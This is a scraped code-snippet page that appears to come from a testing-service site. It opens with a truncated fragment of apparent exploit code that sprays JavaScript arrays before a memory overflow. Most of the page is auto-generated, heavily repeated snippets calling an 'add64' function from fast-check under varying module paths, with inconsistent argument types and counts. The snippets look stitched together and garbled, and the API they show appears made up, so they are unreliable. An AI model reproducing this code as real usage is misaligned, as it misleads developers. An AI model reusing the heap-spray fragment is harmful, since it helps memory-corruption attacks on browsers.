prior to the overflow to increase the odds344var nCount = 0x20;345var objsfh = Array(nCount);346for (var k=0; k<nCount; k++){347 var array = new Array(arrayExLen);348 for (var i=0; i<arrayExMidPoint-1; i++) {349 array[i] = i;350 }351 objsfh[k] = array;352}353for (var k=0; k<nCount-1; k++){354 var o = new Object();...

Full Screen

Full Screen

Using AI Code Generation

copy

Full Screen

1const { add64 } = require("fast-check-monorepo");2console.log(add64(1, 2));3const { add64 } = require("fast-check-monorepo");4console.log(add64(1, 2));5const { add64 } = require("fast-check-monorepo");6console.log(add64(1, 2));7const { add64 } = require("fast-check-monorepo");8console.log(add64(1, 2));9const { add64 } = require("fast-check-monorepo");10console.log(add64(1, 2));11const { add64 } = require("fast-check-monorepo");12console.log(add64(1, 2));13const { add64 } = require("fast-check-monorepo");14console.log(add64(1, 2));15const { add64 } = require("fast-check-monorepo");16console.log(add64(1, 2));17const { add64 } = require("fast-check-monorepo");18console.log(add64(1, 2));19const { add64 } = require("fast-check-monorepo");20console.log(add64(1, 2));21const { add64 } = require("fast-check-monorepo");22console.log(add64(1, 2));23const { add

Full Screen

Using AI Code Generation

copy

Full Screen

1const { add64 } = require('fast-check-monorepo');2console.log(add64(1, 2));3console.log(add64(1, 2, 3));4console.log(add64(1, 2, 3, 4));5console.log(add64(1, 2, 3, 4, 5));6console.log(add64(1, 2, 3, 4, 5, 6));7console.log(add64(1, 2, 3, 4, 5, 6, 7));8const { add64 } = require('fast-check-monorepo');9console.log(add64(1, 2));10console.log(add64(1, 2, 3));11console.log(add64(1, 2, 3, 4));12console.log(add64(1, 2, 3, 4, 5));13console.log(add64(1, 2, 3, 4, 5, 6));14console.log(add64(1, 2, 3, 4, 5, 6, 7));15const { add64 } = require('fast-check-monorepo');16console.log(add64(1, 2));17console.log(add64(1, 2, 3));18console.log(add64(1, 2, 3, 4));19console.log(add64(1, 2, 3, 4, 5));20console.log(add64(1, 2, 3, 4, 5, 6));21console.log(add64(1, 2, 3, 4, 5, 6, 7));22const { add64 } = require('fast-check-monorepo');23console.log(add64(1, 2));24console.log(add64(1, 2, 3));25console.log(add64(1, 2, 3, 4));26console.log(add64(1, 2, 3, 4, 5));27console.log(add64(1

Full Screen

Using AI Code Generation

copy

Full Screen

1const { add64 } = require('fast-check');2console.log(add64(1n, 2n));3const { add64 } = require('fast-check');4console.log(add64(1n, 2n));5const { add64 } = require('fast-check');6console.log(add64(1n, 2n));7const { add64 } = require('fast-check');8console.log(add64(1n, 2n));9const { add64 } = require('fast-check');10console.log(add64(1n, 2n));11const { add64 } = require('fast-check');12console.log(add64(1n, 2n));13const { add64 } = require('fast-check');14console.log(add64(1n, 2n));15const { add64 } = require('fast-check');16console.log(add64(1n, 2n));17const { add64 } = require('fast-check');18console.log(add64(1n, 2n));19const { add64 } = require('fast-check');20console.log(add64(1n, 2n));21const { add64 } = require('fast-check');22console.log(add64(1n, 2n));23const { add64 } = require('fast-check');24console.log(add64(1n, 2n));

Full Screen

Using AI Code Generation

copy

Full Screen

1const add64 = require('fast-check-monorepo/add64');2console.log(add64(1, 2));3const add64 = require('fast-check-monorepo/add64');4console.log(add64(1, 2));5const add64 = require('fast-check-monorepo/add64');6console.log(add64(1, 2));7const add64 = require('fast-check-monorepo/add64');8console.log(add64(1, 2));9const add64 = require('fast-check-monorepo/add64');10console.log(add64(1, 2));11const add64 = require('fast-check-monorepo/add64');12console.log(add64(1, 2));13const add64 = require('fast-check-monorepo/add64');14console.log(add64(1, 2));15const add64 = require('fast-check-monorepo/add64');16console.log(add64(1, 2));17const add64 = require('fast-check-monorepo/add64');18console.log(add64(1, 2));19const add64 = require('fast-check-monorepo/add64');20console.log(add64(1, 2));21const add64 = require('fast-check-monorepo/add64');22console.log(add64(1, 2));

Full Screen

Using AI Code Generation

copy

Full Screen

1const { add64 } = require('fast-check-monorepo-test2');2console.log(add64(1, 2));3const { add64 } = require('fast-check-monorepo-test2');4console.log(add64(1, 2));5const { add64 } = require('fast-check-monorepo-test2');6console.log(add64(1, 2));7const { add64 } = require('fast-check-monorepo-test2');8console.log(add64(1, 2));9const { add64 } = require('fast-check-monorepo-test2');10console.log(add64(1, 2));11const { add64 } = require('fast-check-monorepo-test2');12console.log(add64(1, 2));13const { add64 } = require('fast-check-monorepo-test2');14console.log(add64(1, 2));15const { add64 } = require('fast-check-monorepo-test2');16console.log(add64(1, 2));17const { add64 } = require('fast-check-monorepo-test2');18console.log(add64(1, 2));19const { add64 } = require('fast-check-monorepo-test2');20console.log(add64(1, 2));21const { add64 } =

Full Screen

Using AI Code Generation

copy

Full Screen

1const add64 = require('fast-check-monorepo').add64;2const result = add64(1, 2);3const add64 = require('fast-check-monorepo').add64;4const result = add64(1, 2);5const add64 = require('fast-check-monorepo').add64;6const result = add64(1, 2);7const add64 = require('fast-check-monorepo').add64;8const result = add64(1, 2);9const add64 = require('fast-check-monorepo').add64;10const result = add64(1, 2);11const add64 = require('fast-check-monorepo').add64;12const result = add64(1, 2);13const add64 = require('fast-check-monorepo').add64;14const result = add64(1, 2);15const add64 = require('fast-check-monorepo').add64;16const result = add64(1, 2);17const add64 = require('fast-check-monorepo').add64;18const result = add64(1, 2);

Full Screen

Using AI Code Generation

copy

Full Screen

1const add64 = require('fast-check-monorepo/lib/64bits').add64;2console.log(add64('0x1234567890abcdef', '0x1234567890abcdef'));3const add64 = require('fast-check-monorepo').add64;4console.log(add64('0x1234567890abcdef', '0x1234567890abcdef'));5const add64 = require('fast-check-monorepo').add64;6console.log(add64('0x1234567890abcdef', '0x1234567890abcdef'));7const add64 = require('fast-check-monorepo').add64;8console.log(add64('0x1234567890abcdef', '0x1234567890abcdef'));9const add64 = require('fast-check-monorepo').add64;10console.log(add64('0x1234567890abcdef', '0x1234567890abcdef'));11const add64 = require('fast-check-monorepo').add64;12console.log(add64('0x1234567890abcdef', '0x1234567890abcdef'));13const add64 = require('fast-check-monorepo').add64;14console.log(add64('0x1234567890abcdef

Full Screen

Using AI Code Generation

copy

Full Screen

1const { add64 } = require('fast-check');2const { add64: add64_2 } = require('fast-check');3const a = "0xffffffffffffffff";4const b = "0xffffffffffffffff";5const c = "0xffffffffffffffff";6const d = "0xffffffffffffffff";7const e = "0xffffffffffffffff";8const f = "0xffffffffffffffff";9const g = "0xffffffffffffffff";10const h = "0xffffffffffffffff";11const i = "0xffffffffffffffff";12const j = "0xffffffffffffffff";13const result = add64(add64(add64(add64(add64(add64(add64(add64(add64(add64(a, b), c), d), e), f), g), h), i), j));14console.log(result);15const { add64 } = require('fast-check');16const { add64: add64_2 } = require('fast-check');17const a = "0xffffffffffffffff";18const b = "0xffffffffffffffff";19const c = "0xffffffffffffffff";20const d = "0xffffffffffffffff";21const e = "0xffffffffffffffff";22const f = "0xffffffffffffffff";23const g = "0xffffffffffffffff";24const h = "0xffffffffffffffff";25const i = "0xffffffffffffffff";26const j = "0xffffffffffffffff";27const result = add64(add64(add64(add64(add64(add64(add64(add64(add64(add64(a, b), c), d), e), f), g), h), i), j));28console.log(result);29const { add64 } = require('fast-check');30const { add64: add64_2 } = require('fast-check');31const a = "0xffffffffffffffff";32const b = "0xffffffffffffffff";33const c = "0xffffffffffffffff";34const d = "0xffffffffffffffff";35const e = "0xffffffffffffffff";36const f = "0xffffffffffffffff";37const g = "0xffffffffffffffff";38const h = "0xffffffffffffffff";39const i = "0xffffffffffffffff";40const j = "0xffffffffffffffff";

Full Screen

Automation Testing Tutorials

Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc.

LambdaTest Learning Hubs:

YouTube

You could also refer to video tutorials over LambdaTest YouTube channel to get step by step demonstration from industry experts.

Run fast-check-monorepo automation tests on LambdaTest cloud grid

Perform automation testing on 3000+ real desktop and mobile devices online.

Try LambdaTest Now !!

Get 100 minutes of automation test minutes FREE!!

Next-Gen App & Browser Testing Cloud

Was this article helpful?

Helpful

NotHelpful